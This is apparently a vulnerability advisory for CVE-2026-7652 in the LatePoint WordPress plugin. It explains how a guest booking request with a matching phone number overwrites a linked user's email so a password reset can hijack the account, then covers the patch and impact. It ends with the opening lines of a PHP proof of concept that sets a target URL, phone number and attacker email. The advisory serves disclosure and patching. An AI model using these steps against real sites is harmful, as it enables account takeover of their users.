CVE-2026-7652: LatePoint <= 5.5.0 – Unauthenticated Account Takeover via Weak Password Recovery Mechanism (latepoint)

CVE ID CVE-2026-7652
Plugin latepoint
Severity Medium (CVSS 5.3)
CWE 640
Vulnerable Version 5.5.0
Patched Version 5.5.1
Disclosed May 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-7652: This vulnerability allows unauthenticated attackers to take over WordPress user accounts through the LatePoint plugin’s guest booking flow. The issue affects versions up to and including 5.5.0. It combines a weak password recovery mechanism with insufficient ownership verification, scoring 5.3 on the CVSS scale.

The root cause lies in the `save_connected_wordpress_user()` function in `latepoint.php` (lines 1147-1192). This function propagates a LatePoint customer’s email address to its linked WordPress user account via `wp_update_user()` without verifying that the request originates from the account owner or an administrator. Additionally, the guest booking flow in `steps_helper.php` (around line 1961) allows phone-based contact merging to overwrite an existing customer’s email address without authentication. When the plugin has WordPress user integration enabled, phone-based contact merging active, and customer authentication disabled, an unauthenticated attacker can overwrite the email of a WordPress user that is not yet linked to a LatePoint customer.

To exploit this, an attacker first identifies a target WordPress user account with an email that is not associated with any LatePoint customer. The attacker then sends a POST request to the guest booking endpoint (typically via AJAX or REST API) with parameters including `customer[first_name]`, `customer[last_name]`, `customer[phone]`, and crucially a new `customer[email]` address controlled by the attacker. The phone number must match an existing customer record that is linked to the target WordPress user. The plugin’s phone-based merge logic (in `steps_helper.php` around line 1961) updates the customer’s email to the attacker-controlled address. Subsequently, the `save_connected_wordpress_user()` function propagates this new email to the linked WordPress user account. The attacker then triggers WordPress’s standard password reset flow, which sends a reset link to the attacker-controlled email, enabling full account takeover.

The patch in version 5.5.1 introduces multiple fixes. In `save_connected_wordpress_user()`, it adds a check `$is_owner_or_admin` that requires the current user to be logged in and either the WP user being modified or have `manage_options` capability before syncing data. In `steps_helper.php`, it blocks phone-based merging from overwriting email, first_name, and last_name when the existing customer has a linked WP user and the request is unauthenticated (lines 1965-1969). It also adds input sanitization for customer name fields using `sanitize_text_field()` and notes using `sanitize_textarea_field()` in `customer_model.php` (lines 377-384). The patch also retroactively applies XSS fixes from the same diff to the activities controller and process action previews.

If exploited, this vulnerability results in full account takeover of non-super-admin WordPress user accounts. An attacker can gain access to the victim’s WordPress account, potentially accessing sensitive data, modifying content, or performing actions that the compromised user is authorized to perform. On multi-site installations, super-admin accounts are not affected. The attack does not require any authentication, making it remotely exploitable by unauthenticated attackers.

// CVE-2026-7652 - LatePoint <= 5.5.0 - Unauthenticated Account Takeover via Weak Password Recovery Mechanism

$target_url = 'http://example.com'; // Change to target WordPress site

// Step 1: Identify a target WordPress user with an email not yet linked to a LatePoint customer
// For this PoC, we assume the target user has ID 2 and an email like victim@example.com
// We will use the guest booking flow to overwrite this email via phone-based merge

// Step 2: Find an existing customer record whose phone matches or can be guessed

$phone = '5551234567'; // Hypothetical phone number linked to target user
$attacker_email = 'attacker-controlled@example.com'; // New email to overwrite with
